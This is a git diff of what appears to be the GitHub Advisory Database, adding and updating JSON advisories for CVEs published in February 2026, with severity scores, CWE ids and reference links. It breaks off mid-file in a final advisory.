b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json index 6013449d93966..cfbe14db284a4 100644 --- a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json +++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4v3-95xp-3j5h", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70147" ], "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json new file mode 100644 index 0000000000000..ae8435903a1a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mjjq-x58m-rfxp", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2662" + ], + "details": "A weakness has been identified in FascinatedBox lily up to 2.3. This vulnerability affects the function count_transforms of the file src/lily_emitter.c. This manipulation causes out-of-bounds read. The attack can only be executed locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2662" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily/issues/381" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i381/repro.lily" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753166" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json new file mode 100644 index 0000000000000..dcb5ba7c92618 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p546-7whm-cxpm", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0573" + ], + "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0573" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.22" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.17" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.13" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.10" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.4" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json new file mode 100644 index 0000000000000..5dbb96038594a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-pc54-6j8r", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2661" + ], + "details": "A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2661" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/310" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i310/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json new file mode 100644 index 0000000000000..300677a04c037 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrj7-4954-7p6v", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1999" + ], + "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1999" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json index 7a095742f0820..48a6c66996eda 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-640" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json new file mode 100644 index 0000000000000..9b5ed498e2809 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9wp-qq53-qvjx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2666" + ], + "details": "A flaw has been found in mingSoft MCMS 6.1.1. The affected element is an unknown function of the file /ms/file/uploadTemplate.do of the component Template Archive Handler. Executing a manipulation of the argument File can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2666" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11#issue-3905144613" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json new file mode 100644 index 0000000000000..853829fb4e468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcjr-qg8v-4c3v", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0875" + ], + "details": "A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0875" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json new file mode 100644 index 0000000000000..d1af0c5a66305 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwf8-6fj2-4vrx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2663" + ], + "details": "A security vulnerability has been detected in Alixhan xh-admin-backend up to 1.7.0. This issue affects some unknown processing of the file /frontend-api/system-service/api/system/role/query of the component Database Query Handler. Such manipulation of the argument prop leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2663" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json index e88b5b1de3963..60aa9141202ef 100644 --- a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v3v9-r7ff-976x", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70149" ], "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json new file mode 100644 index 0000000000000..55d2bd16a9b2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr8-g4h2-2x5j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2668" + ], + "details": "A vulnerability was found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. This affects an unknown function of the file /dm/dispatch/user/add of the component User Handler. The manipulation results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2668" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753283" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json new file mode 100644 index 0000000000000..ab1ae0c19d6e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjf9-j9vw-27f4", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70064" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify system data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70064" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/c6f20cd6db1fbb1f0e7e199ead66691d" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json index 092331961c32b..6de3b3a47acd8 100644 --- a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json new file mode 100644 index 0000000000000..857d992cdfa7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-gfvf-4g86", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-1272" + ], + "details": "The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection. This vulnerability affects only Fedora Linux.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:6966" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345615" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json index c4fbde5492dcc..9a34bbdf7d186 100644 --- a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json +++ b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json index 57ba37db12fa6..44a5357ce56be 100644 --- a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xqcm-jrw9-wq72", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-14282" @@ -23,6 +23,18 @@ "type": "WEB", "url": "https://github.com/mkj/dropbear/pull/391" }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/394" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052" + }, { "type": "WEB", "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" diff --git a/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json new file mode 100644 index 0000000000000..d335397c9f0a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrj7-v4x4-74hr", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-8860" + ], + "details": "A flaw was found in QEMU in the uefi-vars virtual device. When the guest writes to register UEFI_VARS_REG_BUFFER_SIZE, the .write callback `uefi_vars_write` is invoked. The function allocates a heap buffer without zeroing the memory, leaving the buffer filled with residual data from prior allocations. When the guest later reads from register UEFI_VARS_REG_PIO_BUFFER_TRANSFER, the .read callback `uefi_vars_read` returns leftover metadata or other sensitive process memory from the previously allocated buffer, leading to an information disclosure vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387588" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-212" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file From c7b29b3cc7a6223d57775d1b036bb3dd6adfffde Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:46:10 +0000 Subject: [PATCH 162/215] Publish Advisories GHSA-r8p8-qw9w-j9qv GHSA-w7h5-55jg-cq2f GHSA-r8p8-qw9w-j9qv --- .../GHSA-r8p8-qw9w-j9qv.json | 111 ++++++++++++++++++ .../GHSA-w7h5-55jg-cq2f.json | 61 ++++++++++ .../GHSA-r8p8-qw9w-j9qv.json | 36 ------ 3 files changed, 172 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json diff --git a/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json new file mode 100644 index 0000000000000..379031026177a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json @@ -0,0 +1,111 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8p8-qw9w-j9qv", + "modified": "2026-02-18T21:44:45Z", + "published": "2026-02-16T12:30:25Z", + 